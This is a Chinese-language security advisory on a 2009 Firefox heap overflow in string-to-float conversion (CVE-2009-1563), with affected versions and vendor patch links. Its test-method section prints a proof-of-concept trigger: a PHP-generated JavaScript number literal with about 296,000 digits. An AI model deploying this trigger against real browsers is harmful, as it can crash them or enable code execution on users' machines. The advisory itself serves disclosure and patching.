安全研究

安全漏洞
Mozilla Firefox浮点转换堆溢出漏洞

发布日期:2009-10-27
更新日期:2009-10-30

受影响系统:
Mozilla Firefox 3.5.x
Mozilla Firefox 3.0.x
不受影响系统:
Mozilla Firefox 3.5.4
Mozilla Firefox 3.0.15
描述:
BUGTRAQ  ID: 36851
CVE(CAN) ID: CVE-2009-1563,CVE-2009-0689

Firefox是一款流行的开源WEB浏览器。

Firefox的字符串到浮点数转换例程中存在堆溢出漏洞,在将包含有超长字符串的JavaScript代码转换为浮点数的时候就可能触发这个溢出,导致执行任意代码。

<*来源:Alin Rad Pop
  
  链接:http://secunia.com/secunia_research/2009-35/
        http://secunia.com/advisories/36711/
        https://www.redhat.com/support/errata/RHSA-2009-1530.html
        http://sunsolve.sun.com/search/document.do?assetkey=1-66-272909-1
        https://www.redhat.com/support/errata/RHSA-2010-0154.html
        https://www.redhat.com/support/errata/RHSA-2010-0153.html
        http://www.ubuntu.com/usn/USN-915-1
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

- -----------------------
<script>
var a=0.<?php echo str_repeat("1",296450); ?>;
</script>
- -----------------------

建议:
厂商补丁:

Mozilla
-------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

http://www.mozilla.org/

RedHat
------
RedHat已经为此发布了一个安全公告(RHSA-2010:0153-02)以及相应补丁:
RHSA-2010:0153-02:Moderate: thunderbird security update
链接:https://www.redhat.com/support/errata/RHSA-2010-0153.html

补丁下载:

Sun
---
Sun已经为此发布了一个安全公告(Sun-Alert-6895892)以及相应补丁:
Sun-Alert-6895892:Multiple Security Vulnerabilities in Firefox Versions Before 3.5.5 May Allow Execution of Arbitrary Code or Unauthorized Access to Certain Data
链接:http://sunsolve.sun.com/search/document.do?assetkey=1-66-272909-1

Ubuntu
------
Ubuntu已经为此发布了一个安全公告(USN-915-1)以及相应补丁:
USN-915-1:Thunderbird vulnerabilities
链接:http://www.ubuntu.com/usn/USN-915-1

浏览次数:2311
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障